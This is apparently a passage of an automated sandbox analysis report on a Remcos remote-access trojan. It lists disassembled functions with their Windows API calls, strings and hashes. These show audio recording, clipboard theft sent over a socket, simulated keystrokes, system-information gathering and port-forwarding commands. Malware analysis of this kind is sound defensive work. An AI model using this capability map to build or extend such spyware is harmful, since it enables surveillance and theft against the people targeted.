                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                            • String ID:
                                                                                            • API String ID: 221034970-0
                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Eventinet_ntoa
                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                            • API String ID: 3578746661-4192532303
                                                                                            • Opcode ID: 303558911fb677df5f0fbdb88223500b43b866a0ea6a955a04bd6d6566dfa78b
                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                            • Opcode Fuzzy Hash: 303558911fb677df5f0fbdb88223500b43b866a0ea6a955a04bd6d6566dfa78b
                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                            • API String ID: 3527080286-3064271455
                                                                                            • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                            • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                            • API String ID: 1462127192-2001430897
                                                                                            • Opcode ID: 1feb9446bd49946b70c9c1d76ba489eb1351f7e3e19703becef35d5c604cd5d7
                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                            • Opcode Fuzzy Hash: 1feb9446bd49946b70c9c1d76ba489eb1351f7e3e19703becef35d5c604cd5d7
                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                            APIs
                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                            • API String ID: 3809562944-3643129801
                                                                                            • Opcode ID: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                            • Opcode Fuzzy Hash: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                            • String ID: XCG$`=G$x=G
                                                                                            • API String ID: 1356121797-903574159
                                                                                            • Opcode ID: 29bf6962141d4a7300ec3585762ff1cfafa7e1f20695c08f0aa6420dc949f944
                                                                                            • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                            • Opcode Fuzzy Hash: 29bf6962141d4a7300ec3585762ff1cfafa7e1f20695c08f0aa6420dc949f944
                                                                                            • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                            • String ID: Remcos
                                                                                            • API String ID: 1970332568-165870891
                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                            • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                            • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                            • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                            • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                            • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                            • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                            • __freea.LIBCMT ref: 00452DAA
                                                                                            • __freea.LIBCMT ref: 00452DB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                            • String ID:
                                                                                            • API String ID: 201697637-0
                                                                                            • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                            • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                            • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                            • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                            • _free.LIBCMT ref: 00444714
                                                                                            • _free.LIBCMT ref: 0044472D
                                                                                            • _free.LIBCMT ref: 0044475F
                                                                                            • _free.LIBCMT ref: 00444768
                                                                                            • _free.LIBCMT ref: 00444774
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                            • String ID: C
                                                                                            • API String ID: 1679612858-1037565863
                                                                                            • Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                                                            • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                            • Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                                                            • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: tcp$udp
                                                                                            • API String ID: 0-3725065008
                                                                                            • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                            • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                            • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                            • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                            APIs
                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                            • String ID: T=G$p[G$>G$>G
                                                                                            • API String ID: 1596592924-2461731529
                                                                                            • Opcode ID: 17534cbbce1471fe965db1e4a040205c2d4f2d5752a0d8f67121475e772d8bd4
                                                                                            • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                            • Opcode Fuzzy Hash: 17534cbbce1471fe965db1e4a040205c2d4f2d5752a0d8f67121475e772d8bd4
                                                                                            • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                            • String ID: .part
                                                                                            • API String ID: 1303771098-3499674018
                                                                                            • Opcode ID: 54257d622aa63ad30bb645e20e598f32bbf93e15d75ec557b2562d4f49382a3f
                                                                                            • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                            • Opcode Fuzzy Hash: 54257d622aa63ad30bb645e20e598f32bbf93e15d75ec557b2562d4f49382a3f
                                                                                            • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                            APIs
                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                            • _wcslen.LIBCMT ref: 0041A8F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                            • API String ID: 37874593-703403762
                                                                                            • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                            • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                            • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                            • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                            • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                            • __freea.LIBCMT ref: 00449B37
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • __freea.LIBCMT ref: 00449B40
                                                                                            • __freea.LIBCMT ref: 00449B65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3864826663-0
                                                                                            • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                            • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                            • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                            • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                            APIs
                                                                                            • SendInput.USER32 ref: 00418B08
                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                              • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InputSend$Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 1167301434-0
                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                            • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                            • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                            APIs
                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                            • String ID:
                                                                                            • API String ID: 2172192267-0
                                                                                            • Opcode ID: 1cf21b3c78c89055b472f434a5839017756ad295560214288860051956d88cc3
                                                                                            • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                            • Opcode Fuzzy Hash: 1cf21b3c78c89055b472f434a5839017756ad295560214288860051956d88cc3
                                                                                            • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                            • _free.LIBCMT ref: 00448067
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                            • _free.LIBCMT ref: 00448233
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
